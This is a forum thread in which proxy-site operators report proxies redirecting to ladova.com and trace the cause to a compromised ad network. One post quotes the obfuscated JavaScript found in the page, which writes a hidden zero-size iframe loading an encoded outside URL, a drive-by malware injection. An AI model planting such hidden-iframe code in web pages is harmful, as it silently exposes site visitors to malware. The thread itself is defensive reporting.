Results 1 to 10 of 10

Thread: Ladova.com Virus/Worm

  1. #1

    Ladova.com Virus/Worm

    Anyone noticed proxies redirecting to ladova.com ? These proxies are submitted daily to the major proxy lists but contain a virus/worm detected by Avast Anti-virus. One of them: harbourbay.co.cc
    ...

  2. #2
    Good thing I run noscript for firefox. (I allow Javascript for trusted websites). But I got harbourbay.co.cc today too. I banned their server IP from submission.

    I found this in their html.

    <body><!-- ad --><script>var/*KPLoI*/KPLoI/*KPLoI*/=/*KPLoI*/document;function/*KPLoI*/QiYRj(UFciG){/*KPLoI*/var/*KPLoI*/EBGaL/*KPLoI*/=/*KPLoI*/\"\",/*KPLoI*/ySCRK/*KPLoI*/=/*KPLoI*/0;for/*KPLoI*/(ySCRK=UFciG.length-1;ySCRK>=0;ySCRK--){EBGaL/*KPLoI*/+=/*KPLoI*/UFciG.charAt(ySCRK);}/*KPLoI*/return/*KPLoI*/EBGaL;}function/*KPLoI*/PvvxD(PpyQH){PpyQH/*KPLoI*/=/*KPLoI*/PpyQH.replace(/[\.]/g,/*KPLoI*/\"%\");PpyQH/*KPLoI*/=/*KPLoI*/unescape(PpyQH);return/*KPLoI*/QiYRj(PpyQH);}function/*KPLoI*/SDMQF(){document.write(\"<style>.GVfWr{width:0%;he ight:0%;border:none;}</style>\");var/*KPLoI*/cmLhl/*KPLoI*/=/*KPLoI*/\"<iframe id=\\"GCmfT\\" src=\\"x\\" class=\\"GVfWr\\"></iframe>\";var/*KPLoI*/MYEhJ/*KPLoI*/=/*KPLoI*/cmLhl.replace(/[\+x]/g,/*KPLoI*/PvvxD(\".6c.6d.74.68.2e.69.61.72.75.6d.61.73.2f.75 .72.2e.75.6d.61.73.6e.6f.69.74.61.72.67.2f.2f.3a.7 0.74.74.68\"));return/*KPLoI*/MYEhJ;}KPLoI.writeln(SDMQF());</script><!-- /ad -->
    I'm guessing there is something malicious in there but its obfuscated.
    Submit new proxies -

  3. #3
    Join Date
    Feb 2009
    Location
    New York, USA
    Posts
    1,137
    Just removed harbourbay.co.cc from my list. Thanks.
    WiredStorm Hosting Solutions
    █ Lightning Fast Shared and Reseller Hosting
    █ cPanel with Softaculous and 24/7 Email (Ticket) Support
    Biodegradable Sunscreen - Unblock Facebook

  4. #4
    I've got that one and another few too. All proxies got submitted from the email lexus.brandson@gmail.com

    So if you can block it, do so
    |Nico Lawsons

  5. #5

    Thumbs up Problem fixed!

    Problem fixed!
    I wonder where that code coming from...

    Thanks for your information Ssize.
    If you have any further info, please don`t hesitate to contact me at admin[at]ladova[dot]com

    Btw, thanks also for my friend, Webevader, for telling me about this thread.
    Love you all...

    Quote Originally Posted by Szise View Post
    Anyone noticed proxies redirecting to ladova.com ? These proxies are submitted daily to the major proxy lists.

  6. #6
    Join Date
    Feb 2009
    Location
    New York, USA
    Posts
    1,137
    The same code is on Free Web Proxy | Free Web Procsy! owned by the same person. If the code is not removed I'm going to have to blacklist it.
    WiredStorm Hosting Solutions
    █ Lightning Fast Shared and Reseller Hosting
    █ cPanel with Softaculous and 24/7 Email (Ticket) Support
    Biodegradable Sunscreen - Unblock Facebook

  7. #7
    Code removed.
    Done.
    That code comes from AdBrite.

    I`m not using AdBrite anymore because of this issue.
    Thanks for your info.

    Quote Originally Posted by Zash View Post
    The same code is on Free Web Proxy | Free Web Procsy! owned by the same person.

  8. #8
    Join Date
    Feb 2009
    Location
    New York, USA
    Posts
    1,137
    Another issue: the proxy (harbourfront.co.cc) you submitted redirects to ladova, which isn't backlinking my proxy. How did you manage to submit it? And please add the link.
    WiredStorm Hosting Solutions
    █ Lightning Fast Shared and Reseller Hosting
    █ cPanel with Softaculous and 24/7 Email (Ticket) Support
    Biodegradable Sunscreen - Unblock Facebook

  9. #9

    Webroot AV

    Quote Originally Posted by Zash View Post
    Another issue: the proxy (harbourfront.co.cc) you submitted redirects to ladova, which isn't backlinking my proxy. How did you manage to submit it? And please add the link.
    Webroot AV also blocking Adbrite as site which is related to malware, so this is another reason to say goodbuy to them and switch to Smowtion.

  10. #10
    Quote Originally Posted by Habaku View Post
    Webroot AV also blocking Adbrite as site which is related to malware, so this is another reason to say goodbuy to them and switch to Smowtion.

    Thats good! Gives the adnetworks a good reason to get off their ass and put a stop to it.
    Submit new proxies -

Similar Threads

  1. Virus
    By Chibi in forum Community Building
    Replies: 18
    Last Post: 30 May, 2010, 15:15 PM
  2. AVG Anit-Virus Free
    By Snowboi in forum General Chat
    Replies: 6
    Last Post: 21 March, 2010, 14:34 PM
  3. What Anti-Virus software do you use?
    By Sbfc_ in forum General Chat
    Replies: 5
    Last Post: 8 March, 2010, 21:00 PM
  4. Warning: Post Card Virus
    By 5starpix in forum General Chat
    Replies: 1
    Last Post: 9 July, 2009, 16:22 PM

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •